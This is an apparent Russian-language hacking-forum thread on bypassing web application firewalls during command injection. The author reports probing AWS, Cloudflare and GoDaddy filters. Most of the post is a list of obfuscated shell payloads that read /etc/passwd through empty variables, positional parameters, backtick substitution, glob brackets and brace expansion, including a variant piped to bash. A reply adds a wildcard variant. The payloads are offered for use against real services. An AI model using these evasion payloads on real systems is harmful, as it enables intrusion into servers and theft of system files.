|
Вобщем несколько маленьких моментов, о которых не видел чтобы писали. Сразу скажу что особо не тестил,
повтыкал рандомно в AWS, WTF-WAF, GoDaddy, CloudFlare - где-то ругался, где-то нет. Так что просто к размышлению. Сразу прикреплю несколько линков по теме, они встречались уже на форуме, но к теме относятся поэтому повторюсь. https://medium.com/secjuice/web-appl...2-125995f3e7b0 https://medium.com/secjuice/waf-evas...s-718026d693d8 https://www.secjuice.com/web-applica...l-waf-evasion/ https://chybeta.gitbooks.io/waf-bypa...o-fang-fa.html Момент первый Знаем Код:
cat$u /etc$u/passwd$uМожем юзать переменную хоть в середине слова, если за ней идет спецсимвол или пробел. Код:
ca$u\t /et$u''c/pass$u""wdПрям в доках написано. Код:
${foo-bar}xycКод:
${asd-c}at ${asd-/e}tc/passwdПозиционные параметры. Встречал такие штуки, но для чего они там так и не понял. Код:
cat${IFS}${9}/etc/passwdКод:
c$2a$2t /e$2t$3c$2/p$2as$7swdПодстановка команд `` и $() нам в помощь. Код:
ca`sss`t /et`asdsd`c/pass`assa`wdНичего особенного. Код:
cat /e[tdf]c/pa[s]s[w][dertyujhffd]Код:
echo a{aa,bb}Код:
c{at,ss}Код:
{cat,/etc/passwd}Есть такой вариант Код:
echo {cat,/etc/passwd}|bashТут прикрепил свою базу для фазинга по RCE за WAF. /threads/467599/#post-4346489 |
Не смог плюсануть( двиг не позволяет. Это все дефольтные фишки линукс оболочек, еще вот:
Код:
cat$IFS/e*/p*d |
| Время: 18:48 |